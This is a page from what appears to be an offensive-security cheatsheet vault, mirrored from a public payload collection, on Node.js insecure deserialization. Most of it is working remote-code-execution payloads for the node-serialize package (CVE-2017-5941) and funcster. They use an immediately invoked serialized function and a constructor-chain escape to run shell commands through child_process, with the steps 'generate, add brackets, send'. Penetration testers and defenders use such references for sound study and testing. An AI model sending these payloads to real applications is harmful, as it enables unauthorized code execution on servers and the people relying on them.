daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

node.md (2625B)


      1 ---
      2 title: "Node Deserialization"
      3 topic: "Insecure Deserialization"
      4 topicSlug: "insecure-deserialization"
      5 sourcePath: "Insecure Deserialization/Node.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Insecure%20Deserialization/Node.md"
      7 sha: "3ac27901c711"
      8 isReadme: false
      9 ---
     10 
     11 # Node Deserialization
     12 
     13 > Node.js deserialization refers to the process of reconstructing JavaScript objects from a serialized format, such as JSON, BSON, or other formats that represent structured data. In Node.js applications, serialization and deserialization are commonly used for data storage, caching, and inter-process communication.
     14 
     15 ## Summary
     16 
     17 * [Methodology](#methodology)
     18     * [node-serialize](#node-serialize)
     19     * [funcster](#funcster)
     20 * [References](#references)
     21 
     22 ## Methodology
     23 
     24 * In Node source code, look for:
     25 
     26     * `node-serialize`
     27     * `serialize-to-js`
     28     * `funcster`
     29 
     30 ### node-serialize
     31 
     32 > An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the `unserialize()` function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE).
     33 
     34 1. Generate a serialized payload
     35 
     36     ```js
     37     var y = {
     38         rce : function(){
     39             require('child_process').exec('ls /', function(error,
     40             stdout, stderr) { console.log(stdout) });
     41         },
     42     }
     43     var serialize = require('node-serialize');
     44     console.log("Serialized: \n" + serialize.serialize(y));
     45     ```
     46 
     47 2. Add bracket `()` to force the execution
     48 
     49     ```js
     50     {"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });}()"}
     51     ```
     52 
     53 3. Send the payload
     54 
     55 ### funcster
     56 
     57 ```js
     58 {"rce":{"__js_function":"function(){CMD=\"cmd /c calc\";const process = this.constructor.constructor('return this.process')();process.mainModule.require('child_process').exec(CMD,function(error,stdout,stderr){console.log(stdout)});}()"}}
     59 ```
     60 
     61 ## References
     62 
     63 * [CVE-2017-5941 - National Vulnerability Database - February 9, 2017](https://web.archive.org/web/20190820172715/https://nvd.nist.gov/vuln/detail/CVE-2017-5941)
     64 * [Exploiting Node.js deserialization bug for Remote Code Execution (CVE-2017-5941) - Ajin Abraham - October 31, 2018](https://web.archive.org/web/20181031111654/https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf)
     65 * [NodeJS Deserialization - gonczor - January 8, 2020](https://web.archive.org/web/20240530025137/https://blacksheephacks.pl/nodejs-deserialization/)